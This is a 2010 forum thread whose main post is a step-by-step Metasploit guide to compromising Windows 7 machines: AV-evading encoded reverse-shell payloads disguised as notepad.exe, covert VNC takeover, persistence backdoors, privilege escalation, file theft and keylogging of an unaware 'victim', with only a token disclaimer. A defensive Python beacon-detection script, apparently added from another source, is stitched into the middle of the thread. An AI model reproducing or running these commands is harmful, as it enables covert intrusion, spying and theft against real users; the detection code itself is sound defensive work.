GoldenGaming


    Infiltrating in Windows7

    Post by I Am Programmer on Thu Dec 09, 2010 3:52 pm

    Infiltrating in Windows7
    Hi ppl... I'm gonna show you how to infiltrate Windows 7 x64 or x86...
    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    First start Back|Track
    {Shell 1} (Creating Exploit)
    Open the konsole

    Code:
    cd /pentest/exploits/framework3
    svn up
    # To update the metasploit framework
    clear

    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -e x86/countdown -c 2 -t raw | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/payload.exe

    # If you get an encoder error, find another EXE or try encoding it fewer times

    # Copy the payload to the target

    # If you want to use this over the internet, remember to use your external IP instead of your internal IP, and redirect the ports to your computer
    =================================

    {Shell 2} (Using Exploit)
    Code:
    cd /pentest/exploits/framework3/

    clear

    ./msfconsole
    use exploit/multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST [IP ADRESS INT.]
    set LPORT [PORT] (if used in msfpayload in Shell 1)
    show options
    exploit



    # Once more: if you are going to use this on the internet, this time use your internal IP, not the external one...
    # Now we wait for a connection, so start the payload on the victim computer
    =================================

    DO NOT CLOSE the meterpreter connection/console; we need it to upload the VNCinject...
    {Shell 3} [Preparing the VNCinject payload]
    Code:
    cd /pentest/exploits/framework3/

    clear

    ./msfpayload windows/vncinject/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -e x86/countdown -c 2 -t raw | \
    ./msfencode -e x86/shikata_ga_nai -c 5 -t raw | \
    ./msfencode -x notepad.exe -t exe -e x86/call4_dword_xor -c 2 -o /root/vncinject.exe


    # I recommend using a different port from the one used in Shell 1
    ==============================
    {Shell 4} [Using VNCinject]
    In a different Metasploit Console (REMEMBER DO NOT CLOSE the one with the meterpreter connection)
    Code:
    use exploit/multi/handler
    set PAYLOAD windows/vncinject/reverse_tcp
    set LHOST [IP ADRESS INT.]
    set LPORT [PORT] (if used in msfpayload in Shell 3)
    show options
    exploit


    # Now in meterpreter console...
    Code:
    upload /root/vncinject.exe C:\\Users\\[username]\\Documents\\vncinject.exe


    # In the local dir you must only use one "/", and on the remote you must use two backslashes ("\\")
    # Now let's execute vncinject.exe
    In the meterpreter console...
    Code:
    execute -f c:\\Users\\[username]\\Documents\\vncinject.exe


    Now you wait and it will show the remote desktop... the user doesn't know that you are spying on him... and you have control of the computer... keyboard and mouse... and you can upload and download files through the meterpreter console
    ================================
    {Setting up backdoors for future use} (when in meterpreter console)
    Code:
    run metsvc (sets a backdoor for the next time you want in)

    (OR THIS)

    run persistence -r [YOUR IP ADDRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send a connection request every 300 sec. "run persistence -h" for more info

    ***UPSIDES AND DOWNSIDES OF USING THIS***

    METSVC:
    VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan; other AVs may do this too!
    BAD: If the IP changes, you have to know the new IP to connect back to the victim
    GOOD: Easy to use
    GOOD: It doesn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) that it is detected as bad and removed, and that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)
    Code:
    cd /pentest/exploits/framework3/

    svn up

    clear

    ./msfconsole

    use exploit/multi/handler

    set PAYLOAD windows/metsvc_bind_tcp

    set LPORT 31337 (Must be this port, as far as I know)

    set RHOST [VICTIM IP ADDRESS]

    show options (see if your setup is correct)

    exploit


    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)
    Code:
    cd /pentest/exploits/framework3/

    svn up

    clear

    ./msfconsole

    use exploit/multi/handler

    set PAYLOAD windows/meterpreter/reverse_tcp

    set LHOST [IP ADDRESS INT.]

    set LPORT [PORT]
    # The port set in persistence backdoor

    show options

    exploit

    ----------
    # Now we wait for a connection; it will reconnect to your computer within 300 sec
    ----------
    Code:
    getuid
    # If it is "NT AUTHORITY\SYSTEM", do this; else go to "use priv":

    ps
    # Find the PID of explorer.exe

    steal_token [NUMBER - PID of explorer]
    # From what I know it grants you the same rights as the user running that process

    use priv

    getsystem


    Some useful commands for meterpreter
    Code:
    search -f *.jpg
    # Finding all JPG files on the system

    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG files in a specific folder

    search -f test.txt
    # Find a specific file on the whole system


    {Uploading and Downloading} (How I use it)
    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on your BT4 desktop and write anything in it, or nothing, and save it with the name "test.txt". Then in the terminal, in the meterpreter console (after you're connected to the victim), navigate to the desktop of the user currently logged in.
    Use "pwd" without quotes to check if the path is correct; if it is, type the following

    {Upload}
    Code:
    upload /root/test.txt test.txt

    # and if you are uploading a file with a space in its name:

    upload "/root/test 2.txt" "test 2.txt"

    # Or if you're not in the path where you want to upload a file, and want it to be uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"

    {Download}

    Explanation:
    Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, by using the "cd", "pwd" and "ls" commands.

    Then type:
    Code:
    download test.txt /root/test.txt

    # And if you are downloading a file with a space in its name

    download "test 2.txt" "/root/test 2.txt"

    # Or if you're not in the path where you want to download a file from, but know the exact path and name by using search

    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"




    {Commands} (meterpreter console)

    help
    # USE THIS!!! That's mostly how I got this knowledge, and then googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory you're in

    ls
    # List Current Directory

    upload
    # See above

    download
    # See above

    search
    # See above and Meterpreter Search. This can be used in different consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop


    Few words from me:

    First I will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

    Do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!
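
    The post above leaves two network-visible traces on a compromised host: the metsvc backdoor listens on port 31337, and the persistence script calls back to one remote IP and port at a fixed 300-second interval. The Python script below is an added example written for this page from the defender's side; it is not code from the post or from Metasploit. It runs over a constructed connection log (the record layout, host names, addresses and process names are assumptions made up for the example) and flags outbound connections to one destination at a near-constant interval, which is what a timer-driven callback looks like, plus any listener on the bind port the post names. The interval check uses the spread of the gaps rather than a hard-coded 300 s, so it generalises to any fixed callback interval.

```python
from collections import defaultdict
from statistics import mean, pstdev

# Port the post names for the metsvc bind payload ("set LPORT 31337").
METSVC_BIND_PORT = 31337

# Constructed sample connection records (not real telemetry).  Layout is an
# assumption for this example:
#   (time_s, host, state, local_port, remote_ip, remote_port, process)
# state is "ESTABLISHED" for an outbound connection or "LISTEN" for a socket
# waiting for inbound connections.
SAMPLE_CONN_LOG = [
    # WS01: the same process reaches the same remote every ~300 s, the
    # callback cadence produced by the post's "persistence ... -i 300".
    (0,    "WS01", "ESTABLISHED", 49152, "203.0.113.10", 4444, "svchost.exe"),
    (300,  "WS01", "ESTABLISHED", 49160, "203.0.113.10", 4444, "svchost.exe"),
    (600,  "WS01", "ESTABLISHED", 49171, "203.0.113.10", 4444, "svchost.exe"),
    (901,  "WS01", "ESTABLISHED", 49180, "203.0.113.10", 4444, "svchost.exe"),
    (1200, "WS01", "ESTABLISHED", 49193, "203.0.113.10", 4444, "svchost.exe"),
    # WS01: ordinary browsing at irregular times; must not be flagged.
    (12,   "WS01", "ESTABLISHED", 49153, "198.51.100.5", 443, "chrome.exe"),
    (47,   "WS01", "ESTABLISHED", 49155, "198.51.100.5", 443, "chrome.exe"),
    (415,  "WS01", "ESTABLISHED", 49166, "198.51.100.5", 443, "chrome.exe"),
    (430,  "WS01", "ESTABLISHED", 49167, "198.51.100.5", 443, "chrome.exe"),
    (1100, "WS01", "ESTABLISHED", 49190, "198.51.100.5", 443, "chrome.exe"),
    # WS02: something listening on the metsvc bind port; the process name is a
    # placeholder, since the post does not name the service binary.
    (0,    "WS02", "LISTEN", METSVC_BIND_PORT, "0.0.0.0", 0, "unknown.exe"),
    # WS02: a normal listener (RDP) that the port rule must leave alone.
    (0,    "WS02", "LISTEN", 3389, "0.0.0.0", 0, "svchost.exe"),
]


def find_beacons(records, min_hits=3, max_cv=0.1):
    """Flag (host, remote, process) groups whose outbound connections are
    evenly spaced.  The coefficient of variation (stdev / mean) of the gaps
    between consecutive connections is near zero for a timer-driven callback
    and large for human-driven traffic."""
    by_dest = defaultdict(list)
    for t, host, state, _lport, rip, rport, proc in records:
        if state == "ESTABLISHED":
            by_dest[(host, rip, rport, proc)].append(t)

    hits = []
    for (host, rip, rport, proc), times in by_dest.items():
        if len(times) < min_hits:
            continue
        times.sort()
        gaps = [later - earlier for earlier, later in zip(times, times[1:])]
        avg = mean(gaps)
        if avg <= 0:  # all connections at one instant: a burst, not a beacon
            continue
        if pstdev(gaps) / avg <= max_cv:
            hits.append({"host": host, "remote": (rip, rport), "process": proc,
                         "interval_s": round(avg), "count": len(times)})
    return hits


def find_suspicious_listeners(records, ports=frozenset({METSVC_BIND_PORT})):
    """Flag LISTEN sockets on ports associated with a bind-style backdoor."""
    return [{"host": host, "port": lport, "process": proc}
            for _t, host, state, lport, _rip, _rport, proc in records
            if state == "LISTEN" and lport in ports]


def analyze(records):
    """Combined report over one connection log."""
    return {"beacons": find_beacons(records),
            "listeners": find_suspicious_listeners(records)}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_CONN_LOG), indent=2))
```

    Run it directly to print the report as JSON. Real telemetry (firewall or proxy logs, EDR network events) has to be mapped onto the record tuple first, and the `max_cv` threshold needs tuning against normal keep-alive traffic, which can also be periodic; a port-based listener rule only catches the default the post mentions, so pair it with an inventory of which services are expected to listen on each host.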

    Re: Infiltrating in Windows7

    Post by AoD GhostGFX on Thu Dec 09, 2010 5:44 pm

    nice , you heard of GodMode ?

    Re: Infiltrating in Windows7

    Post by I Am Programmer on Thu Dec 09, 2010 5:56 pm

    Yes, why do you ask?
